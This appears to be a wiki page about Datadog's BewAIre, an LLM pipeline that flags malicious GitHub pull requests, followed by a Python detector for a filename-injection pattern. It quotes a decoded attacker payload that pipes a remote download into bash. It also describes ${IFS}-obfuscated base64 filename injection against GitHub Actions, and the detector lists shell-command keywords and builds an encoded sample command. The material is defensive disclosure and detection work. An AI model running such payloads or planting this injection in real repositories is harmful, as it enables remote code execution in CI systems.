
SYSTEM

BewAIre

BewAIre is Datadog's LLM-driven malicious-PR detection pipeline. It continuously ingests GitHub events across internal and external repositories (≈10,000 PRs per week), selects security-relevant triggers (PRs, pushes), extracts, normalizes, and enriches each diff, and classifies it as benign or malicious via a two-stage LLM pipeline with structured-rationale output.

Malicious verdicts are forwarded to Datadog Cloud SIEM, where a detection rule generates enriched security signals; Datadog's Security Incident Response Team (SIRT) triages them as cases, escalating to incidents when warranted. BewAIre was first disclosed in Datadog's 2025 post Detecting Malicious PRs at Scale; the 2026-03-09 hackerbot-claw retrospective is its first publicly disclosed production catch.

Shape

  • Input: continuous GitHub-event stream (PRs, pushes).
  • Filter: security-relevant triggers only.
  • Diff processing: extract, normalize, enrich.
  • Classifier: two-stage LLM pipeline producing {verdict, structured rationale}.
  • Output routing: malicious verdicts → Cloud SIEM → detection rule → enriched signal → SIRT case → incident (if escalated).

Canonical wiki instance of patterns/llm-pr-code-review.

Disclosed production datum

On 2026-02-27, BewAIre fired the alert on PR #7 in DataDog/datadog-iac-scanner ~33 seconds after the PR opened (05:26:25 → 05:26:58). Eighteen minutes later it caught PR #8 on the same repo, which attempted a closely related exploit with a different filename. Both PRs were GitHub Actions script-injection attempts: ${IFS}-obfuscated base64 payloads embedded in filenames under documentation/rules/. Decoded payload: curl -sSfL hackmoltrepeat[.]com/molt | bash.
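As an added illustration (not Datadog's code; BewAIre's actual classifier is an LLM, not this heuristic), a defender-side pre-filter for the filename pattern described above: flag changed paths that carry the ${IFS} word separator and a base64 blob decoding to a shell command, emitting the same {verdict, rationale} shape. Sample paths and the encoded command are constructed, not the real PR #7/#8 filenames.

```python
import base64
import re

# ${IFS} is the shell's word separator; in an unquoted filename reaching a
# GitHub Actions shell step it stands in for spaces the attacker cannot use.
IFS_RE = re.compile(r"\$\{?IFS\}?")
# Candidate base64 runs (short runs are ignored to skip ordinary path words).
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Substrings a decoded blob must contain before we call it a shell command.
SHELL_HINTS = ("curl ", "wget ", "| bash", "| sh", "/bin/sh", "$(")

def decoded_shell_fragments(path):
    """Return base64 runs in `path` that decode to shell-looking ASCII text."""
    hits = []
    for m in B64_RE.finditer(path):
        frag = m.group(0)
        padded = frag + "=" * (-len(frag) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except ValueError:  # not valid base64, or non-ASCII once decoded
            continue
        printable = all(c.isprintable() or c in "\n\t" for c in text)
        if printable and any(h in text for h in SHELL_HINTS):
            hits.append(text)
    return hits

def assess_filename(path):
    """Classify one changed path with a structured rationale list."""
    rationale = []
    if IFS_RE.search(path):
        rationale.append("ifs_word_separator_in_path")
    for text in decoded_shell_fragments(path):
        rationale.append(f"base64_decodes_to_shell: {text!r}")
    if len(rationale) >= 2:
        verdict = "malicious"
    elif rationale:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"path": path, "verdict": verdict, "rationale": rationale}

def assess_diff(paths):
    """Run the filter over every changed path in a PR diff."""
    return [assess_filename(p) for p in paths]

# Constructed samples: a harmless placeholder command, not the real payload.
_BLOB = base64.b64encode(b"curl example.invalid/sample | bash").decode()
SAMPLE_MALICIOUS = f"documentation/rules/rule_${{IFS}}{_BLOB}${{IFS}}.md"
SAMPLE_BENIGN = "documentation/rules/aws-s3-public-bucket.md"

if __name__ == "__main__":
    for r in assess_diff([SAMPLE_BENIGN, SAMPLE_MALICIOUS]):
        print(r["verdict"], r["path"], r["rationale"])
```

A verdict of "malicious" here would be the point at which a pipeline like BewAIre's forwards to the SIEM; ordinary path words such as documentation/rules do not decode to ASCII and are skipped.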

Not disclosed

  • Classifier model / prompt / fine-tuning data.
  • False-positive / false-negative rates.
  • Per-model cost at 10K-weekly-PR volume.
  • How BewAIre's classification evolves as attackers adapt.
  • Latency distribution beyond the ~33-s datum.
